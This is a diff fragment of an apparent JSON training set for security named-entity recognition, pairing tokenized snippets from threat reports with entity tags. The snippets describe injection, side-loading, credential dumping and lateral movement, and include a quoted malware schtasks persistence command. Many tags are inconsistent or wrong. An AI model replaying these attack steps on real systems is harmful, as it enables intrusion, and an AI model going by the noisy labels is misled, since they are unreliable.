"O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "by", + "creating", + "immediate", + "tasks", + "through", + "GPO." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "abused", + "group", + "policy", + "objects", + "(GPO)", + "to", + "install", + "loaders" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Propagation", + "through", + "GPO" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "will", + "submit", + "immediate", + "tasks", + "to", + "the", + "hosts", + "in", + "the", + "domain", + "through", + "GPO" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "the", + "hosts", + "receive", + "the", + "task", + "through", + "GPO" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "usually", + "compile", + "all", + "necessary", + "libraries", + "in", + "a", + "single", + "binary,", + "making", + "malware", + "classification", + "more", + "difficult", + "for", + "analysts", + "and", + "resulting", + "in", + "a", + "large", + "binary" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "victim", + "opens", + "the", + "document," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injecting", + "the", + "shellcode", + "into", + "rundll32.exe" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Shellcode", + "which", + "is", + "used", + "for", + "code", + "injection" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "proxy" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "create", + "scheduled", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "create", + "a", + "ImmediateTask" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "API" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "APIs" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "backdoor", + "is", + "a", + "basic", + "remote", + "shell" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\cmd.exe", + "/c" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "forcing", + "its", + "component", + "SmadAVprotect32.exe", + "to", + "side-load", + "their", + "malicious", + "DLL." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "starts", + "a", + "function", + "called", + "bypassSMADAV" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "with", + "the", + "API", + "function", + "IsWindowVisible." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "by", + "IsWindowVisible", + "function" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "calling", + "the", + "RegisterClass", + "function", + "prior", + "to", + "calling", + "CreateWindow." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Before", + "a", + "call", + "to", + "CreateWindowEx,", + "you", + "would", + "usually", + "first", + "need", + "to", + "create", + "a", + "class", + "by", + "calling", + "RegisterClass", + "and", + "then", + "class", + "CreateWindowEx." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "malware", + "creates", + "2", + "scheduled", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "schtasks", + "/Create", + "/TN", + "test", + "/SC", + "MINUTE", + "/MO", + "15", + "/TR" + ], + "ner_tags": [ + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "creates", + "a", + "scheduled", + "task", + "to", + "execute", + "its", + "copy", + "from", + "this", + "randomized", + "path:", + "schtasks", + "/Create", + "/TN", + "8NaZrCq3pGeDRXKF", + "/SC", + "MINUTE", + "/MO", + "15", + "/TR", + "\"explorer.exe", + "c:\\users\\public\\8NaZrCq3pGeDRXKF.zip\\8NaZr.exe\"", + "/f" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-Idus", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "final", + "payload", + "returned", + "is", + "a", + "lightweight", + "PowerShell", + "backdoor," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "It", + "then", + "picks", + "one", + "random", + "C&C", + "URL", + "out", + "of", + "the", + "three", + "available", + "and", + "constructs", + "a", + "GET", + "request" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "them", + "back", + "to", + "the", + "server", + "in", + "POST", + "request:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "the", + "validation", + "of", + "the", + "JSON", + "and", + "Base64", + "decoding" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "by", + "various", + "actors", + "to", + "disable", + "endpoint", + "protection", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "techniques", + "like", + "process", + "hollowing", + "where", + "the", + "process", + "is", + "created", + "in", + "suspend", + "mode", + "and", + "then", + "replaced", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "current", + "system", + "username" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "current", + "username", + "home", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "system’s", + "network", + "interfaces", + "(name,", + "MacAddress,", + "description)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "was", + "deployed", + "using", + "DLL", + "side-loading" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "due", + "to", + "DLL", + "side-loading,", + "the", + "loader/injector", + "winutils.dll", + "is", + "loaded", + "into", + "memory", + "and", + "runs", + "in", + "the", + "context" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "abused", + "to", + "side-load" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Packed", + "Rorschach", + "loader", + "and", + "injector" + ], + "ner_tags": [ + "B-Way", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "initial", + "loader/injector", + "winutils.dll", + "is", + "protected", + "with", + "UPX-style", + "packing" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "unpacking,", + "the", + "sample", + "loads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "and", + "injected" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "decrypts", + "config" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "into", + "notepad.exe,", + "where", + "the", + "ransomware", + "logic", + "begins." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "injected", + "into", + "notepad.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Disable", + "the", + "Windows", + "firewall,", + "using", + "netsh.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "When", + "executed", + "on", + "a", + "Windows", + "Domain", + "Controller", + "(DC),", + "the", + "ransomware", + "automatically", + "creates", + "a", + "Group", + "Policy,", + "spreading", + "itself", + "to", + "other", + "machines", + "within", + "the", + "domain." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "group", + "policy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "another", + "group", + "policy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "another", + "group", + "policy" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "them", + "from", + "the", + "original", + "location." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "a", + "schedule", + "task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "registers", + "a", + "scheduled", + "task", + "which", + "runs", + "immediately", + "and", + "upon", + "user", + "logon," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "finds", + "the", + "relevant", + "syscall", + "numbers", + "for", + "NT", + "APIs," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "with", + "the", + "syscall", + "instruction" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "first", + "creates", + "a", + "syscall", + "table", + "for", + "NT", + "APIs" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creation", + "of", + "syscall", + "table", + "for", + "certain", + "NT", + "APIs." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "makes", + "direct", + "system", + "calls", + "using", + "the", + "“syscall”", + "instruction." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Example", + "use", + "of", + "direct", + "syscall." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "It", + "uses", + "GetSystemDefaultUILanguage", + "and", + "GetUserDefaultUILanguage", + "to" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "WinAPI", + "CryptGenRandom", + "is", + "utilized" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "implemented", + "via", + "NtSetInformationFile", + "using", + "FileInformationClass", + "FileRenameInformation," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Command", + "Line", + "Arguments" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "list", + "of", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "code", + "is", + "protected", + "and", + "obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "obfuscated", + "process" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reusing", + "multiple", + "code", + "chunks", + "from", + "DEP-allowed", + "memory", + "pages,", + "called", + "ROP", + "gadgets." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ROP-based", + "attacks", + "execute", + "“RET”", + "instructions", + "without", + "a", + "prior", + "“CALL”", + "instruction,", + "the", + "running", + "thread’s", + "stack", + "and", + "the", + "shadow", + "stack", + "values", + "mismatch" + ], + "ner_tags": [ + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "call", + "other", + "vfgadgets", + "that", + "are", + "responsible", + "for", + "executing", + "specific", + "operations,", + "like", + "Argument", + "LoadersInvokers", + "and", + "Collectors." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Collectors", + "are", + "gadgets", + "that", + "retrieve", + "a", + "value", + "already", + "present", + "in", + "a", + "register,", + "and", + "save", + "it", + "back", + "into", + "the", + "attacker’s", + "counterfeit", + "object" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "leaked", + "the", + "stack", + "pointer", + "and", + "retrieved", + "the", + "this", + "pointer", + "as", + "a", + "static", + "offset", + "from", + "the", + "stack." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "vfgadget", + "address," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "prepare", + "the", + "address", + "of", + "the", + "Windows", + "API", + "we", + "want", + "to", + "invoke", + "along", + "with", + "its", + "arguments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Windows", + "API", + "address", + "and", + "its", + "arguments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "invoke", + "any", + "API", + "we", + "like," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "began", + "sending", + "spam", + "emails,", + "mailing", + "new", + "malicious", + "attachments", + "to", + "continue", + "spreading." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "discover", + "commands", + "using", + "the", + "Windows", + "utilities", + "systeminfo" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "ipconfig" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "ipconfig", + "/all" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "ipconfig", + "/all" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Remote", + "access", + "tools", + "were", + "used", + "for", + "command", + "and", + "control,", + "such", + "as", + "Tactical", + "RMM", + "and", + "Anydesk." + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "deployed", + "Tactical", + "RMM,", + "a", + "remote", + "management", + "agent,", + "for", + "additional", + "access", + "and", + "persistence", + "in", + "the", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "accessed", + "the", + "environment", + "using", + "Tactical", + "RMM", + "to", + "deploy", + "Anydesk", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "proceeded", + "to", + "deploy", + "several", + "remote", + "management", + "tools", + "across", + "the", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tactical", + "RMM", + "is", + "a", + "remote", + "management", + "software", + "platform", + "that", + "uses", + "a", + "combination", + "of", + "agents", + "to", + "allow", + "for", + "remote", + "management", + "and", + "access", + "to", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "added", + "AnyDesk", + "to", + "the", + "same", + "server", + "running", + "Tactical", + "RMM,", + "providing", + "an", + "additional", + "means", + "of", + "access", + "prior", + "to", + "the", + "deployment", + "of", + "ransomware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "by", + "the", + "threat", + "actor", + "for", + "the", + "remote", + "management", + "of", + "Tactical", + "RMM", + "Agent." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "this", + "RMM", + "agent", + "they", + "proceeded", + "to", + "install", + "AnyDesk", + "on", + "the", + "host." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Tactical", + "RMM", + "Agent", + "was", + "installed", + "by", + "the", + "threat", + "actor", + "on", + "a", + "server", + "to", + "ensure", + "remote", + "access" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "intrusion", + "began", + "when", + "a", + "user", + "double", + "clicked", + "a", + "LNK", + "file,", + "which", + "then", + "executed", + "encoded", + "Powershell", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "The", + "Powershell", + "script,", + "when", + "double", + "clicked", + "(executed)," + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "also", + "used", + "tasklist" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Next,", + "they", + "proceeded", + "to", + "transfer", + "a", + "beacon", + "executable", + "over", + "SMB", + "to", + "the", + "remote", + "host’s", + "ProgramData", + "directory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors,", + "however,", + "proceeded", + "along", + "a", + "more", + "traditional", + "path,", + "using", + "SMB", + "file", + "transfers", + "and", + "remote", + "services", + "to", + "move", + "laterally", + "across", + "domain", + "controllers", + "and", + "several", + "other", + "servers" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "rasomware", + "deployment", + "to", + "all", + "hosts", + "over", + "SMB." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "files", + "transferred", + "via", + "SMB", + "as", + "SYSTEM", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "executable", + "Cobalt", + "Strike", + "beacon", + "was", + "copied", + "via", + "SMB", + "to", + "a", + "target", + "machine" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "beacon", + "was", + "then", + "successfully", + "executed", + "via", + "WMI" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "then", + "executed", + "via", + "WMI." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "wmic" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "setup", + "a", + "Registry", + "Run", + "Key", + "to", + "maintain", + "persistence", + "on", + "the", + "beachhead", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "established", + "persistence", + "via", + "a", + "run", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "commands", + "to", + "download", + "an", + "Emotet", + "DLL", + "onto", + "the", + "computer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "dropped", + "Powertool64.exe", + "and", + "dontsleep.exe", + "in", + "preparation", + "for", + "their", + "final", + "actions." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "then", + "dropped", + "SoftPerfect’s", + "Network", + "Scanner" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "dropped", + "and", + "executed", + "on", + "the", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "net", + "commands", + "were", + "run," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "proceeded", + "to", + "run", + "the", + "net", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "conducted", + "further", + "discovery", + "tasks", + "running", + "find.bat", + "and", + "p.bat," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "and", + "a", + "batch", + "file", + "1.bat", + "were", + "dropped", + "on", + "the", + "host", + "and", + "the", + "batch", + "file", + "was", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "two", + "batch", + "files", + "were", + "run." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "first", + "find.bat", + "was", + "used", + "to", + "run" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\cmd.exe", + "/c" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/c", + "start" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "executed", + "a", + "batch", + "script" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "then", + "proceeded", + "to", + "dump", + "credentials", + "from", + "the", + "LSASS", + "process", + "on", + "the", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "‘mimikatz’", + "string", + "in", + "the", + "Netlogon", + "event", + "that", + "is", + "used", + "by", + "the", + "Mimikatz", + "Zerologon", + "implementation." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "Process", + "access", + "to", + "LSASS", + "was", + "observed,", + "likely", + "to", + "dump", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Granted", + "Access", + "level", + "matches", + "know", + "indicators", + "for", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "request", + "access", + "level", + "of", + "0x0040", + "(64)", + "to", + "LSASS,", + "as", + "well", + "indicating", + "other", + "credential", + "access", + "tools", + "may", + "have", + "been", + "in", + "use", + "by", + "the", + "threat", + "actor." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O" + ] + }, + { + "tokens": [ + "With", + "some", + "further", + "process", + "injection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "was", + "observed", + "process", + "injecting", + "into", + "legitimate", + "process" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "from", + "a", + "process", + "that", + "was", + "injected", + "with", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Injected", + "Process", + "Name" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "processes", + "used", + "for", + "injection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "specific", + "mechanism", + "used", + "to", + "inject", + "into", + "a", + "foreign", + "process,", + "was", + "injecting", + "arbitrary", + "code", + "into", + "its", + "memory", + "space,", + "and", + "executing", + "it", + "as", + "a", + "remotely", + "created", + "thread" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "from", + "an", + "injected", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "flight", + "of", + "netlogon", + "authentications", + "were", + "observed", + "from", + "the", + "beachhead", + "host", + "to", + "the", + "domain", + "controller", + "as", + "a", + "possible", + "attempt", + "at", + "exploiting", + "the", + "domain", + "controller." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "choosing", + "a", + "new", + 